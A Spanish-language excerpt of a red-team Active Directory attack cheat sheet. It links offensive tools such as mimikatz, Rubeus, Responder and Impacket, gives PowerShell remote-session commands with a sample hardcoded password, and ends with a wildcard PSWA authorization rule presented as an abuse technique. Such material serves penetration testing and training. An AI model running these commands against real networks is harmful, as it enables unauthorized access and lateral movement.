
Hoja de trucos del Red Team en constante expansión.

Puedes apoyarme aquí 🐱 :
Esta hoja de trucos de ataques AD, creada por RistBS, está inspirada en el repositorio Active-Directory-Exploitation-Cheat-Sheet.
Herramientas de PowerShell :
[⭐] Nishang -> https://github.com/samratashok/nishangnishang tiene múltiples scripts útiles para pentesting en Windows en entorno PowerShell.
PowerView es un script de PowerSploit que permite la enumeración de la arquitectura AD para un posible movimiento lateral.
Herramientas de enumeración :
[⭐] Bloodhound -> https://github.com/BloodHoundAD/BloodHound[⭐] crackmapexec -> https://github.com/byt3bl33d3r/CrackMapExeKit de herramientas de explotación AD :
[⭐] Impacket -> https://github.com/SecureAuthCorp/impacket[⭐] kekeo -> https://github.com/gentilkiwi/kekeoHerramientas de volcado :
[⭐] mimikatz -> https://github.com/gentilkiwi/mimikatz[⭐] rubeus -> https://github.com/GhostPack/RubeusHerramienta de escucha :
[⭐] responder -> https://github.com/SpiderLabs/ResponderPS-Session :```powershell #METHOD 1 $c = New-PSSession -ComputerName 10.10.13.100 -Authentication Negociate -Credential $user Enter-PSSession -Credential $c -ComputerName 10.10.13.100
$pass = ConvertTo-SecureString 'Ab!Q@aker1' -asplaintext -force $cred = New-Object System.Management.Automation.PSCredential('$user, $pass') Enter-PSSession -Credential $c -ComputerName 10.10.13.100
### Abuso de PSWA
permite que cualquiera con credenciales se conecte a cualquier máquina y cualquier configuración
**[ ! ] esta acción requiere credenciales.**```powershell
Add-PswaAuthorizationRule -UsernName * -ComputerName * -ConfigurationName *